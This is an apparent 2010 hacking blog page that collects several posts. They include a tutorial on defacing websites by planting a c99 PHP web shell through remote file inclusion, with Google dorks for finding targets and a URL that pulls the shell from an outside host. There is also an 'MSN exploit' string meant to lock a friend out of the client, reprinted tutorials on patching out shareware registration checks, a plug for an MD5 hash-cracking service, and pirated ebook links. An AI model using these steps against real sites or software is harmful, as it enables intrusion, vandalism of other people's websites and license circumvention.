Monday, March 15, 2010

Defacing a Site using a c99 Shell

Defacing a Site using a c99 shell
okay hey guys today i will show you how to deface a site using a c99 shell.
Okay first what is defacing? Well defacing is like you remove some contents of the site and show that it has been hacked by you. Defacing is a very good way of proving your a good hacker. Okay so lets get started
First you need a c99 shell, which can be easily found on google
Your antivirus might think its a virus but it isnt! Okay now you will need to find exploitable sites. Here are some ways to find it
Google Dork:
Code:
inurl:"upload.php"
Code:
inurl:"page=home.html"
Code:
inurl:"news/id="
That is one way of finding a c99 shell. See always upload a c99 shell with a .TXT or .JPG extension. You can change the extension but it wont change anything in the shell. I just leave mine as a c99.txt.
Another way of finding vulnerable sites is finding a random website that shows
[CODE]http://site.com/page=
[/CODE]
On that page= you can put your shell so it would look like
[CODE]http://site.com/page=http://geocities.com/noimus13/c99.txt[/CODE]
If its vulnerable it would look like this
See this..
It means its vulnerable. Now lets add some cool stuff on it to show its defaced!
First you gotta go to the Home Directory. Which is..
Code:
public_html
OR
Code:
httpd.www
But public_html is more used
Now lets navigate to that directory
Okay now once we are their you might see index.html
Delete that. If you have your own index.html then this is what you would do
Now once you have uploaded it then go back to the site. It will be defaced showing your name and whatever the hell you put in their.
Thanks for reading this tut!

Exploit-Me

Exploit-Me is a FireFox plugin which is developed to ease penetration testings via web browser. Exploit-Me is currently developed to exploit 2 types of web application vulnerabilities, which are Sql injection and XSS.
Download:
http://www.securitycompass.com/exploitme.shtml
Enjoy!

Hackers Highschool

The Hacker Highschool project is the development of license-free, security and privacy awareness teaching materials and back-end support for teachers of elementary, junior high, and high school students.
Today's kids and teens are in a world with major communication and productivity channels open to them and they don't have the knowledge to defend themselves against the fraud, identity theft, privacy leaks and other attacks made against them just for using the Internet. This is the reason for Hacker Highschool.
Download:
http://hotfile.com/dl/29938229/84f51c2/hacker_highschool.rar.html

MSN Exploit

If someone put this code in his Personal Message. He?ll never able to login again.Send it to a Wannabefriend and say his name will be lighten up or anything else. You'll see hell log off and, when he want to log on there come an Error Message.
[CODE] n?a_??ay?m?a????????????a???O??????r??? ?+N? ?L??? [/code]

Google Apps Hacks

Google Apps Hacks
Can Google applications really become an alternative to the venerable
Microsoft Office suite? Conventional wisdom may say no, but practical
wisdom says otherwise. Right now, 100,000 small businesses are currently
running trials of Google office applications. So are large corporations
such as General Electric and Proctor & Gamble. Google Apps Hacks gets
you in on the action with several ingenious ways to push Google's web,
mobile, and desktop apps to the limit. The scores of clever hacks and
workarounds in this book help you get more than the obvious out of a
whole host of Google's web-based applications for word processing,
spreadsheets, PowerPoint-style presentations, email, calendar, and more
by giving you ways to exploit the suite's unique network functionality.
You get plenty of ways to tinker with:
- Google Documents -- Share and edit documents with others in real
time, view them on the run with Google Docs mobile service, and use
Google Notebook for web research
- Google Spreadsheets -- Add real-time data to spreadsheets, and
generate charts and tables you can embed in web pages
- Google Presentations -- View them on a mobile phone and save them as
video
- Gmail -- Send email to and from a mobile phone, adjust Gmail's
layout with a style sheet, and a lot more
- iGoogle -- Create your own gadgets, program a screenscraper, add
Flash games, and more
- Google Calendar -- Add web content events, public calendars, and
your Outlook Calendar to this application
- Google Reader, Google Maps, Google Earth, and Google SketchUp: the
new 3D modeling software tool
- Picasa, YouTube, and Google Video -- discover new ways to customize
and use these media management apps
In addition, Google Apps Hacks outlines ways you can create a simple
web site with nothing but Google tools, including Page Creator, Blogger,
Google Analytics, and content from other Google apps. This amazing
collection just might convince you that Microsoft Office is not the last
word in business applications. The price is certainly right.
Download:
http://hotfile.com/dl/29935830/8c5c67b/Google.Apps.Hacks.Apr.2008.eBook_1_hackerz5.rar.html
http://hotfile.com/dl/29935846/9aea8dc/Google.Apps.Hacks.Apr.2008.eBook_2_hackerz5.rar.html

Cracking Tutorial Pt. 2

Cracking Tutorial - Part 2

Copyrights Reserved to the 1999 from Black Sun Research Facility (http://blacksun.box.sk).

Index:

0. Introduction.
1. Disclaimer.
2. The main steps of cracking.
3. Additional programs you need to have for this part of the tutorial.
4. Cracking the first program (sweet little piano).
5. Conclusion
================================================================================
========

0. Introduction:

In this part, the second part of the cracking tutorial, you will learn to use the most
important tools of the common cracker: W32Dasm and HIEW.
You will also learn to crack some simple programs.
The tutorials are divided into 3 parts:
Part 1: Introduction, tools and the basics of cracking.
Part 2: Practical training, using W32Dasm, and HIEW.
Part 3: key-generators.
Welcome to the second part. :-)

1. Disclaimer:

I created this tutorial for informational purposes only!
Much of the information in this document can be used to perform illegal activities!
Don't attempt to do anything stated in this document!
If you do attempt to do anything, you are solely and fully responsible for what you do!
If you get caught and get in any kind of trouble, it's your own fault!
If you intend to use this information to impress your friends, leave it and grow up!
If you don't agree to this, do not read any more!
If you crack a program, and either sell the crack or offer it for free, it is a crime!

2. The main steps of cracking

You have already seen these steps in the previous part of the tutorial,
but it's very important to know them. Remembering these steps and following them is 40%
of the way towards success in cracking the program!!!
There are 7 steps in the cracking process:
1. Run the program you want to crack and study it's behavior.
try to locate strings and keywords, try to enter the password and see how the program responds.
2. Open the program with the W32Dasm and disassemble it.
3. Find typical and common Strings in the disassembly that appeared within the program.
in most cases, you have to look for keywords such as: password, name, date, expired,
Time limit, wrong, entered and so on.
4. Find and observe the password generator, find the learn protection routine and the API calls.
5. Try to understand the jumping mechanism of the protection.
6. Open the program in Hiew.
change the jump of the flow control to it's opposite jump command, or NOP it out.
7. Run and check how the change you have made in the original program affected it.
Feel the power you have, the power of of cracking, making programs behave the way you want them to.
Learn those steps very well, until u dream of them, u will use them in every program you crack.

3. Additional programs you need to have for this part of the tutorial

By now, in this part of the tutorial, you have learnt the main steps of cracking.
Now, you are going to crack your first program.
But before that, you need to get a little program called: "Sweet Little Piano"
You can download it from:
-----------------
www.ronimusic.com
-----------------
Now, when you have the program, let's start!

4. Cracking the first program (Sweet little Piano)

Now we will follow each step and crack the program:
____________________________
Step 1: Running the program:
____________________________
Well, Run it! Duh... :-)
Well, what do we see here.....
The program opens two text files.
Also we see "Unregistered Shareware" on the caption bar...
Now let's open the Help menu for any registration options...
Humm, what do we see here now...
oh, it's a password option...
Well, select it and enter something (don't hope it will be right :-)).
To see what happens... Click OK..
Hmm, nothing happens....
Maybe it accepted it? Hmm.. no way... the caption bar still says Unregistered...
Ok close it... bah ... more text files ... and a notification that the settings are not
saved in the unregistered version ... well ... kind of irritating those text files!
Let's fix it :-)
________________________________
Step 2: Disassemble the program:
________________________________
Disassemble the program. Good, small is fast :-) Always....
Now, we don't have any strings that pop up when we want to register something...
Let's browse for strings like registered, unregistered, the string about the unsaved settings.
Hmm... evaluation time left ... password.txt.... passworddialog....
sweet little piano - Unregistered <<-- looks like our caption bar ;-) go on...
Thanks for registering ... cool! So it thanks you anyway :-)
Let's jump to that place ... Double click on it an we will pop right on top of the registration routine...
________________________________________________________________________________
_____
Step 3: Analyzing the protection routine.... / Understanding the jumping Mechanism...
________________________________________________________________________________
_____
Let's analyze the protection routine.
////////////////////// Code snip ///////////////////////////
ADDRESS MACHINE CODE ASSEMBLER INSTRUCTIONS
* Possible Reference to Dialog: PASSWORDDIALOG, CONTROL_ID:0064, ""
|
:00401715 6A64 push 00000064
:00401717 53 push ebx
* Reference To: USER32.GetDlgItemTextA, Ord:0000h
|
:00401718 E8A5B50000 Call 0040CCC2
:0040171D E822FFFFFF call 00401644
:00401722 85C0 test eax, eax
:00401724 741E je 00401744
:00401726 6A30 push 00000030
* Possible StringData Ref from Data Obj ->"SweetPiano"
|
:00401728 6866D24000 push 0040D266
* Possible StringData Ref from Data Obj ->"Thanks for registering!"
|
:0040172D 68FED14000 push 0040D1FE
:00401732 53 push ebx
////////////////////// Code snip ///////////////////////////
PasswordDialog ... a call to GetDlgItemTextA ... another call.... a test...
and depending on the test a je.... The je jumps over the thank you ...
And just ends the dialog box ... without telling you that you entered something wrong...
So this is right ... we did indeed not see that we typed something wrong ... but apparently we are supposed to see
if we type something right :-)
Again execute the je jump, and look where it goes to ... return from the jump....
Now lets try to rewrite what goes on here...
___________________________________________________________________________
call ShowPasswordDialog
call GetEnteredText
call IsEnteredTextGood
test value in eax
je QuietExit
ShowThanksForRegistering
QuietExit:
___________________________________________________________________________
the source code must have looked like this :
___________________________________________________________________________
GetDlgItemText(_ID_Serial);
if (EnteredTextGood) ShowThanksForRegistering
// else nothing....
___________________________________________________________________________
This is another interesting piece of code.... test eax, eax ... this assembler instruction tests if the value of eax is equal to itself ... if it is it is equal ... so a je instruction jumps ... if it is not equal, it does not jump....
To crack this program we can change the je instruction into two nop instructions... and we are done...
We have seen here, that the call has put a value in eax.... something which is not equal to zero or a zero... In our
previous example we saw that the called Is_Serial_Valid call set some value in memory ... Here we see that the called
Is_Serial_Valid call sets the eax register of our processor to some value....
Step 4: Changing the original program...
So modify it :-)
1. Open Hiew.
2. Open the file within Hiew.
3. Find the Adress of the line in W32Dasm (it's on the status bar beginning with '@').
4. Press F5 in Hiew.
5. Enter the address you have found in (4) and press ENTER.
6. Press F3 - for activating the write option.
7. Press F2 - to change the instruction.
8. Replace the command by 'NOP' (without quotes), which means NO OPERATION.
9. Now a new command appeared in the next line.
10. Replace it by NOP too.
11. If another new instruction hasn't appeared, Press F9 to update the file.
12. Press F10 to exit.
13. Run the program and see the result.
If you didn't succeed, have any questions or need any additional information,
E-Mail me at sagid@netvision.net.il and I will answer all of your questions.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

5. Conclusion

I gave this quite 'hard' cracking example so that u know that if you crack this program,
you can crack almost every program, and most of them are much simpler to crack.
In the next part you will learn to detect key generators and crack them.
Before you go to the next chapter, go over the steps again, and also go over the protection
mechanism detection and modification.
C ya then.
------------------------------------

Cracking Tutorial - Part 1

Cracking Tutorial - Part 1
 version 1.0
Copyrights reserved to the (sagid@netvision.net.il) of Black Sun Research Facility (blacksun.box.sk)

index:

0. Introducion.
1. Disclaimer.
2. What is cracking?
3. Tools.
4. The main steps of cracking.
5. Basic terms in assembly.
6. Final conclusion.
================================================================================
===========

0. Introducion:

I have read many cracking tutorials lately.
Frankly speaking, I myself learned cracking from tutorials (and some book, but this doesnt really matter).
The majority of the cracking tutorials out there have a few disadvantages: either they are too long and contain a
lot of garbage, or they are too short, and don't contain the basics.
I decided to write a tutorial which will not have those two disadvantaged.
Anyway, I divided the tutorial into 3 parts:
Part 1: Introduction, tools and The basics of cracking.
Part 2: Practical training, using W32Dasm, and HIEW
Part 3: Key-generators.
Welcome to the first part. ;-)

1. Disclaimer:

I created this tutorial for informational purposes only!
Much of the information in this document can be used to perform illegal activities!
Don't attempt to do anything stated in this document!
If you do attempt to do anything, you are solely and fully responsible for what you do!
If you get caught and get in any kind of trouble, it's your own fault!
If you intend to use this information to impress your friends, leave it and grow up!
If you don't agree to this, do not read any more!
If you crack a program, and either sell the crack or offer it for free, it is a crime!

2. What is Cracking?

For me, cracking is:
"Letting a program, which is on your computer behave as you want it
to behave and not behave as someone else (the programmer) wants"
As INTERN said:
"Hey, it is your stuff right? your numbers, your bits,
you should be able to do anything you wish to do with it "
Actually, I agree to this.
So cracking is modifying your programs, and making them work they way you want them to.
U can get a free demo program, crack it, and use it.
BUT!!!!
I repeat, if you crack a program, and start selling the cracked version or even offering it for free, it is a crime!
_____________________________________________________________________________
After reading those three tutorials (this is the first one in thsi series),
you will feel the power you have in your hands (I mean, in your head).
well, let's get started?

3. Tools

There are very few tools you need by now...
It is very easy to find them over the web, cause they are quite popular:
The first one is "Win32 Disassembler", which is also know ans W32Dasm.
The Win32 Disassembler allows you to:
1. Disassemble files - translate the program to it's assembly origin, or machine code.
The file types which can be disassambled in Win32 Disassembler:
exe, 386, com, cpl, drv, dll, fon, mpd, ocx, vbx, vbx and sys.
2. Load the program proccess and trace the program.
3. Browse the disassembled file and go to any code location that you want.
4. Find text.
5. Execute, insert or remove jumps and calls.
6. Import and export functions.
7. Show a HEX display of a code area.
8. Show the list of the STRINGS, DIALOGS and REFERENCES.
9. Save the Disassembly source in text format.
Well, u can get it in almost any cracking site, but I'll give you some URLs:
1. http://www.wco.com/~micuan/Zips/wdasm893.zip
--------------------------------------------
2. HTTP://CRACKING.HOME.ML.ORG/
----------------------------
3. http://www.fortunecity.com/bally/waterford/18/w32dsm89.zip
----------------------------------------------------------
4. http://wowsites.com/meiner/w32dsm89.zip
---------------------------------------
I think that's about enough.
If any of these links goes down, please alert me (my Email address is sagid@netvision.net.il).
The second tool you need is Hiew, which is also known as Hacker's View.
The Hacker's View Tool allowes you to:
1. Disassemble files.
2. Make changes in the disassembled file, such as:
write commands, modify commands and reassemble the file.
3. View the file in ASCII, Hex or assembly mode.
Here are some URL's as well:
1. ftp://ftp.cs.tu-berlin.de/pub/msdos/mirro...rog/hiew584.zip
------------------------------------------------------------------------------------
2. ftp://ftp.bke.hu/pub/mirrors/sac/utilprog/hiew584.zip
-----------------------------------------------------
3. ftp://ftp.uakom.sk/pub/mirrors/sac/utilprog/hiew584.zip
-------------------------------------------------------
You can also download an excellent program for cracking called Soft-ICe.
Anyway, we won't need it in this part of the tutorial.
Anyway, here are some URLs for Soft-ICe.
SoftICE for Windows95:
1. http://swlink.net/~lachcik/insaine/si95w320.zip
-----------------------------------------------
2. http://www.fortunecity.com/bally/waterford/18/siw95-32.zip
----------------------------------------------------------
3. http://www.pmk.ac.th/~arnontc/files/siw95-32.zip
------------------------------------------------
4. ftp://toolz.ucl.autograd.ru/Debugger/W95ICE32.ZIP
-------------------------------------------------
SoftICE for Windown NT:
1. http://www.pmk.ac.th/~arnontc/files/siwnt-32.zip
------------------------------------------------
2. ftp://ftp.sol.no/users/r/reopsahl/OrcPaks/orcpak9e.zip
------------------------------------------------------
3. http://www.fortunecity.com/bally/waterford/18/siwnt-32.zip
----------------------------------------------------------
4. ftp://toolz.ucl.autograd.ru/Debugger/WNTICE32.ZIP
-------------------------------------------------
There's also SoftICE for DOS, which I dont recommend.
1. http://www.pmk.ac.th/~arnontc/files/s-ice280.zip
------------------------------------------------
2. ftp://ftp.ula.ve/pub/msdos/cracking/s-ice280.zip
------------------------------------------------
3. http://202.102.15.149/~person/paulgao/cracks/SICE280.ZIP
--------------------------------------------------------
4. ftp://ftp.sonic.net/pub/users/fryman/tools/S-ice280.zip
-------------------------------------------------------
5. http://www.chibacity.com/chiba/files/unpro/prx-pcs3.zip
-------------------------------------------------------
You can also download the Win 3.1x versions at:
1. ftp://ftp.ula.ve/pub/msdos/cracking/m_wice13.zip
------------------------------------------------
2. http://fishheads.simplenet.com/BriansFiles/m_wice13.zip
-------------------------------------------------------
3. http://www.magiccarpet.com/~odin/files/other/m_wice13.zip
---------------------------------------------------------

4. The Main steps of cracking

There are 7 steps in the process of cracking:
1. Run the program you want to crack and learn it's standard behavior.
Try to locate strings and keywords, try to enter the password and see how the program responds.
2. Open up the program with the W32Dasm and disassamble it.
3. Find typical and common strings in the disassembly that appeared in the program.
In most cases, you have to look for keywords such as: password, name, date, expired,
time limit, wrong, entered and so on.
4. Find and observe the password generator, find the learn protection routine and the API calls.
5. Try to understand the jumping mechanism of the protection.
6. Open up the program in HIEW.
Change the jump of the flow control to it's oposite jump command, or nop it out.
7. Run and see how the change you have made in the original program affected it.
Feel the power you have, the power of cracking, letting programs behave as you want them to.
Learn those steps very well, until u dream of them, u will use them in every program you crack.
5. Basic terms in Assembly
-------------
A. Registers:
-------------
Registers are variables which are stored in your processor.
The processor uses these variables for basic mathimatical and logical operations.
The mostly used registers are: eax, ebx, ecx and edx.
Sometimes you will see edi, esi, esp, ebp.
There are three types of registers: 32Bit registers, 16Bit registers and 8Bit registers.
The 32Bit registers start with e, such as eax.
There are 16Bit equivalents of these registers.
The only Difference between the two types is the veriable size.
These registers are: ax, bx, cx, dx, di, si, sp, bp.
There are also 8 bit registers.
Tthe 8Bit registers are: al, ah, bl, bh, cl, ch, dl, dh.
l - means the lower 8 bits of the 16Bit register.
h - means the higher 8 bits of the 16Bit register.
Here the l stands for the lower and h for the higher 8 bits of a 16 bit register.
--------
B. Flags
--------
Flags are Boolean variables (get 0 or 1 values).
Flags are used by the processor for internal logical and mathimatical operations,
in order to get the result of the operation.
The most important flag is the Zero Flag, which can get zero or non-zero (1) values.
------------
C. Code Flow
------------
When you are analyzing a piece of code, you must understand that the processor
is actually quite stupid, and all it does is to simply follow the basic instructions,
line by line.
It does anything the code tells it to do, and cannot do anything that is not written
in the code (unless it has been run over by a herd of cows and abducted by aliens).
This is why you have to think like the processor when you're analyzing a piece of code,
and to act like it (just don't get used to it! Inhale, exhale, inhale, exhale... nevermind, stupid joke)
You have to do everything the processor does, you have to compare registers and variables, execute jumps and calls,
calculate Basic mathimatical operations, store and load register values and adresses, and so on...
The processor has an instruction pointer especially for this, which is also called IP
(it has nothing to do with IP addresses in the Internet Protocol, trust me).
Using the instruction pointer, the processor points to the instruction that is about to be executed.
The processor also has and executes instructions which change the code flow.
These instructions can be function calls, any other routine calls, jumps, conditional jumps, which depend
on the zero flag, negative conditional jumps...

6. Conclusion

In this part of the tutorial we have learnt the meaning of the word cracking.
Making programs behave as you want them to, and not the way the programmer wants them to.
We have also learnt about the basic and the popular tools of cracking: W32Dasm, Hiew and SoftICE.
And finally we have learnt the 7 main steps of cracking.
Now, Before you go to the next chapter, you have to learn these 7 steps and download the tools
mentioned above, because we can't go on to the next chapter unless you have those tools and know the steps.
Cya in the next chapter.

Crack MD5 Hashes Online

[CODE]www.NetMD5Crack.com[/CODE]
Info:
Message Digest Algorithm 5, commonly referred to as MD5, is the internet standard in security applications. The algorithm yields a hash consisting of a 32 digit hexadecimal number, allowing for 2^128 unique outputs. There is no way to decrypt an MD5 hash. While there is no way to decrypt an MD5 hash, they can be cracked. An attacker may use a brute force method in an attempt to crack a hash. Brute forcing is when the attacker puts all imaginable combinations of characters through the algorithm and checks the outputs. When an output is generated with the same hash as the original, the attack is finished and the attacker has cracked the hash. NetMD5Crack offers another way for security analyzers to decrypt hashes. We have compiled a database of over 7,000,000 hashes and their plain text. To use our service simply enter a hash into the cracker. Our database will be searched thereafter. If we find a have the hash already then the plain text will be returned, saving you hours of time executing brute force attacks.
I tried it out and it works for me.

Download IPL Anthems of all the teams

Download IPL Anthems of all the teams

Theme Song of the DLF IPL

Click here to download DLF IPL theme song

Theme Song of Set Max T20 Extra Innings

Click here to download DLF IPL Extra Innings theme song

Chennai Super Kings IPL Team Anthem..

Click here to download DLF IPL Deccan Chargers anthem

Rajasthan Royals IPL Team Anthem..

a)2008 Version..

b)2009 Version..

Kolkata Knight Riders IPL Team Anthem..

a)2008 Version..

Click here to download DLF IPL Kolkata Knight Riders anthem (2008 Version)

b)2009 Version(Slow)..

c)2009 Version(Fast)

Mumbai Indians IPL Team Anthem..

a)Anthem 1

b)Anthem 2

Punjab Kings Eleven IPL Team Anthem..

Click here to download DLF IPL Punjab Kings anthem

Delhi Daredevils IPL Team Anthem